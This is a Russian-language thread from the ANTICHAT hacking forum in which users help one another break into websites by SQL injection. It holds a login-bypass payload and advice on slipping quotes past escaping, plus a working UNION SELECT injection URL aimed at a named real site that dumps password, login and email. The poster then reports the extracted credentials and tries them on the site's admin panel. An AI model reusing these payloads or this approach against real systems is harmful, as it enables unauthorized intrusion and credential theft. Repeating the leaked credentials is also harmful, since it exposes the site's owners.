HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 284 из 2422 « Первая < 184234274 280 281 282 283 284 285 286 287 288 2943343847841284 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 06.08.2008, 16:49
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
С нами: 10188506

Репутация: 861


По умолчанию
Buddah, твой пример - слепая инъекция. Слепая, потому что нет вывода. Что бы прочитать какие-то данные из базы используют подзапросы и побуквенно вытаскивают инфу. Почитай это:

1) http://dev.mysql.com/doc/

2) https://forum.antichat.ru/thread19605.html

3) https://forum.antichat.ru/thread35207.html

А по поводу того как лучше искать поле и всё прочее - поле должно иметь вывод на страницу, тебе же надо увидеть какие-то данные?
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 06.08.2008, 17:32
Buddah
Новичок
Регистрация: 26.11.2007
Сообщений: 6
С нами: 9715161

Репутация: 5
По умолчанию
Цитата:
Сообщение от n0ne  
Buddah, твой пример - слепая инъекция. Слепая, потому что нет вывода. Что бы прочитать какие-то данные из базы используют подзапросы и побуквенно вытаскивают инфу. Почитай это:

1) http://dev.mysql.com/doc/

2) https://forum.antichat.ru/thread19605.html

3) https://forum.antichat.ru/thread35207.html

А по поводу того как лучше искать поле и всё прочее - поле должно иметь вывод на страницу, тебе же надо увидеть какие-то данные?
спасибо пошел читать
 
Ответить с цитированием

  #3  
Старый 06.08.2008, 16:54
muse
Новичок
Регистрация: 25.09.2005
Сообщений: 29
С нами: 10854458

Репутация: 9
По умолчанию
есть сайт http://site.com/index.php
на котором можно залогинится.
я посылаю следующий POST запрос

Код:
login=admin'+OR+1=1&password=qwerty
выдает следующую ошибку

Код:
[IBM][CLI Driver][DB2/LINUX] SQL0010N The string constant beginning with "'" does not have an ending string delimiter. SQLSTATE=42603 Attempted Query: select c.id,login,password,user_name,org_name,dt_of_birth,rtrim(who_is) as WHO_IS,"plan",last_login,last_updated,ip_addr,street,city,country,zip,phone,icq,email,dish_size,expired,dealer,manager,status,c.transponder as transponder,card_type,os_type,c.kind,acl,p.pid as pid,bgp_as,bgp_peer,mac_addr,can_chng_plan,can_pay,prize_percent,prize_id,mobile,rtrim(type_conn) as type_conn from clients as c left join plans as p on c."plan"=p.id where login='admin\\\' OR 1=1'
из ошибки видно что добавляются слеши и я думаю что изза них и не пропускает...

кто что может посоветовать ???
 
Ответить с цитированием

  #4  
Старый 06.08.2008, 22:42
Grey
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
С нами: 10483586

Репутация: 5826


По умолчанию
Цитата:
Сообщение от muse  
выдает следующую ошибку

Код:
[IBM][CLI Driver][DB2/LINUX] SQL0010N The string constant beginning with "'" does not have an ending string delimiter. SQLSTATE=42603 Attempted Query: select c.id,login,password,user_name,org_name,dt_of_birth,rtrim(who_is) as WHO_IS,"plan",last_login,last_updated,ip_addr,street,city,country,zip,phone,icq,email,dish_size,expired,dealer,manager,status,c.transponder as transponder,card_type,os_type,c.kind,acl,p.pid as pid,bgp_as,bgp_peer,mac_addr,can_chng_plan,can_pay,prize_percent,prize_id,mobile,rtrim(type_conn) as type_conn from clients as c left join plans as p on c."plan"=p.id where login='admin\\\' OR 1=1'
из ошибки видно что добавляются слеши и я думаю что изза них и не пропускает...

кто что может посоветовать ???
Скорее всего ты здесь ничего не сделаешь, т.к. судя по всему мейджик_квотс = он:

Думаю что вначале кавычка экранировалась слешем (который ставился квотой), а затем сам скрипт экранировал повторно и кавычку и слеш (поставленный квотой), т.е. скорее всего даже если мейджик_квотс был равен = офф, ты бы здесь ничего не сделал.

А вообще в таких случая нужно приписывать перед кавычкой слеш (в надежде что мейджик_квотс = офф и что скриптом слеш не будет экранирован), тогда получится что один слеш экранирует другой, а кавычка останется не экранированной ( \\' ).
Последний раз редактировалось Grey; 06.08.2008 в 22:45..
 
Ответить с цитированием

  #5  
Старый 06.08.2008, 22:48
eLWAux
Постоянный
Регистрация: 15.06.2008
Сообщений: 941
С нами: 9423746

Репутация: 2399


По умолчанию
привет.
ребята, помогите мне пожалуйста вот с етим:
http://alvis.ru/company_news/index.php3?id=-1+union+select+1,2,3,concat_ws(char(58),pwd,login, email),5,6,7,8,9,10,11,12,13,14+from+users/*
а дальше че-т не идет..

через SICT перебрал таблици, вроде есть admin, но доступа у меня к ней нету =(
 
Ответить с цитированием

  #6  
Старый 06.08.2008, 23:01
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами: 10081287

Репутация: 568
По умолчанию
Цитата:
Сообщение от eLWAux  
привет.
ребята, помогите мне пожалуйста вот с етим:
http://alvis.ru/company_news/index.php3?id=-1+union+select+1,2,3,concat_ws(char(58),pwd,login, email),5,6,7,8,9,10,11,12,13,14+from+users/*
а дальше че-т не идет..
что не идет ?

Цитата:
через SICT перебрал таблици, вроде есть admin, но доступа у меня к ней нету =(
абсолютно верно..
Цитата:
SELECT command denied to user 'alvis'@'localhost' for table 'admin'
 
Ответить с цитированием

  #7  
Старый 06.08.2008, 23:10
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию
Цитата:
Сообщение от sabe  
абсолютно верно..
Не совсем.
Не факт, что таблица есть, натпись "command denied" вылезает так-же при неверном значении таблицы.

http://alvis.ru/company_news/index.php3?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12, 13,14+from+abracadabra/*

Ну или там есть таблица "abracadabra", и к ней тоже закрыт доступ

Цитата:
Сообщение от eLWAux  
если вводить ети дание, то админ_панель отказиваетса показиватса =)
А кто сказал что они должны подойти?
Последний раз редактировалось jokester; 06.08.2008 в 23:12..
 
Ответить с цитированием

  #8  
Старый 06.08.2008, 23:06
eLWAux
Постоянный
Регистрация: 15.06.2008
Сообщений: 941
С нами: 9423746

Репутация: 2399


По умолчанию
ну на запрос к администраторской панели:
http://alvis.ru/admin
просит ввести имя и пароль..
если виполнить предодущий запрос (которий я написал), то ми увидем:
shb09789:www:webmaster@alvis.ru

если вводить ети дание, то админ_панель отказиваетса показиватса =)
 
Ответить с цитированием

  #9  
Старый 06.08.2008, 23:14
eLWAux
Постоянный
Регистрация: 15.06.2008
Сообщений: 941
С нами: 9423746

Репутация: 2399


По умолчанию
я посто программой SICT перебирал названия таблиц, и поля, и прога мне сказала что таблица admin сущечтвует =) (а может бить и abracadabra сучествует =))
 
Ответить с цитированием

  #10  
Старый 06.08.2008, 23:20
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию
Цитата:
Сообщение от eLWAux  
прога мне сказала что таблица admin сущечтвует
Я и не говорю , что нет, я говорю "не факт"
Цитата:
Сообщение от eLWAux  
если нам виводитса мило, логин и пароль, то должи же они кудо-то подходить =)
Логично, но они могут быть от чего угодно, ищи ещё какие-то формы входа

И версия sabe в посте ниже , тоже может быть верной
 
Ответить с цитированием
Ответ
Страница 284 из 2422 « Первая < 184234274 280 281 282 283 284 285 286 287 288 2943343847841284 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.